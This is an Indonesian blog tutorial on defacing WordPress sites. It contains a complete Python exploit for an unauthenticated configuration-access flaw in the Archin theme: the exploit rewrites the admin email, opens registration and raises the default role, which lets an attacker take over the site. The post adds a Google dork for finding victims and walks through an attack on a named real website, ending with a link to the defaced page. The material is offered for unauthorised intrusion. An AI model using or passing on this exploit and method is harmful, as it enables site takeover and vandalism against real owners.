Sabtu, 24 Agustus 2013

Deface Wordpress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Selamat datang pemirsa,,ketemu lagi sama saya Riwn48 :D
kali ini saya akan share "Deface Wordpress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability". 

tanpa basa-basi,,langsung aja kita menuju ke T K P! :v

Pertama anda harus instal Python dulu. Setelah itu, buka notepad, dan pastekan script berikut :


# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site

site = "situs.com"
#path to ajax.php
url = "wp-content/themes/archin/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):

params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(site)
conn.request("POST", url, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()

ChangeOption(site, url, "admin_email", "akicha@jkt48-cyber.org")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "shintanaomi")
print "Now register a new user, they are an shintanaomi by default!"

Save di direktori C: dengan nama archin.py (untuk memudahkan saja) .

Langkah selanjutnya, dorking di google dengan dork berikut :
/wp-content/themes/vithy/hades_framework/ (kembangkan sendiri)
Setelah nemu target, coba di ctrl + u .


Lalu edit archin.py , sesuaikan dengan target diatas :D
ganti situs.com dengan basement-pa.de
ganti archin dengan vithy
ganti akicha@jkt48-cyber.org dengan email anda
ganti shintanaomi dengan user keinginan anda. :p

Langkah selanjutnya, buka CMD, lalu ketik cd\
Setelah itu, ketik lagi archin.py
Tunggu sampai proses selesai :D
Sekarang buka http://www.basement-pa.de/wp-login.php?action=register
Masukkan data, dan cek email , maka anda akan mendapat password nya :D

Sekarang coba login dengan user dan password yang didapat :D
Lolz, login sukses :v
Tapi bangke ni situs gak bisa edit themes -_-
Install plugins juga gak bisa :3
jadi ya gini aja deh :D
http://www.basement-pa.de/hacked/
Mirror


Sekian tutorial kali ini,, semoga bermanfaat ya sobat ^_^ 
Edit : Riwn48 Sumber : Madura Cyber 

Tidak ada komentar:

Posting Komentar